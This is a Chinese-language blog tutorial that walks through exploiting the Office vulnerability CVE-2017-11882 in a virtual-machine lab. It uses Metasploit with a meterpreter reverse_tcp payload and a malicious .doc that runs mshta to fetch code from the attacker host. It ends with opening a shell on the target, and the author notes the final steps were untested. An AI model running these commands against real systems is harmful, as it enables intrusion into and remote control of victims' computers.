注:可以在kali中打开此博客,所有的命令行直接拖动即可,无需自己手敲,一方面是为了方便,一方面是防止不留意写错,可能导致前功尽弃。
目录
一、下载与设置
1、操作系统下载
我们用到win7及kali操作系统,用win7做目标机,并安装好带有漏洞的office。用kali做攻击机。
2、操作系统安装
安装kali虚拟机。安装教程参考:
https://blog.csdn.net/shuiyixin/article/details/101021285
安装win7。
3、脚本及cve文件下载
Python脚本:https://github.com/Ridter/CVE-2017-11882。脚本用于生成恶意文件。
cve文件:https://github.com/0x09AL/CVE-2017-11882-metasploit。
4、文件转存
把下载的cve_2017_11882.rb文件复制到如下目录:
/usr/share/metasploit-framework/modules/exploits/windows/smb/
把下载的cve_2017_11882.rtf放到如下目录:
/usr/share/metasploit-framework/data/exploits/
通过命令行可以查看,如下:
二、操作
1、打开metasploit
点击metasploit图标打开软件。
2、查找cve模块
使用命令查找对应的模块:
search cve_2017_11882
3、使用cve模块
使用exploit
use exploit/windows/smb/cve_2017_11882
首先使用命令设置payload为反弹tcp。
set payload windows/meterpreter/reverse_tcp
其次使用命令设置攻击机的ip(可以使用ifconfig查看)。
set lhost 192.168.72.130
再使用命令设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
set URIPATH test
最后检查配置。
show options
4、运行-exploit -j
5、生成恶意doc文件
在桌面右键打开一个终端,把Command109b_CVE-2017-11882.py复制到桌面,为了方便,可以将文件改个名字cve.py,运行命令python cve.py -c "mshta http://192.168.72.130:8080/test" -o test4.doc 生成恶意doc文件。
这里要注意:
Python系统自带,无需自己再下载;
http://192.168.0.110:8080/test:是路径。前面的“192.168.72.130”是ip地址,可以通过ifconfig查看;8080是端口,固定的;test是前面设置的URIPATH,前面设置是什么,这里就写什么。
test4是文件名,可以自己设置的。
6、打开文件
复制文件到目标机打开。我复制的方式是使用优盘,从kali虚拟机存到外接优盘,再从外接优盘转存到win7虚拟机
注:7、8、是理论操作了,目前没有找到合适的office(有漏洞的版本),所以并没有按照预期得到结果。后面找到了再进行完善。
7、Kali查看
返回kali查看,可以看到已经访问通过。
使用命令进行查看。可以看到win7系统的相关信息。
sessions -i
输出命令切换进入win7控制程序。
sessions -i 1
8、入侵操作
通过以上的命令,我们就可以进入到win7系统,输入shell,就可以进入cmd界面,就可以使用cmd命令进行一系列操作。
三、注意点
在实现过程中遇到很多问题,在这里总结:
win7系统不要下载那种可以一键安装的系统,无法用虚拟机打开。
文件的下载等操作一般都是在kali中实现,所以,可以直接将本文在kali中打开。文件直接下载到kali中。
office尽量下载老版本,有漏洞,可以实现该功能。现在网上的一般都是修复后的。
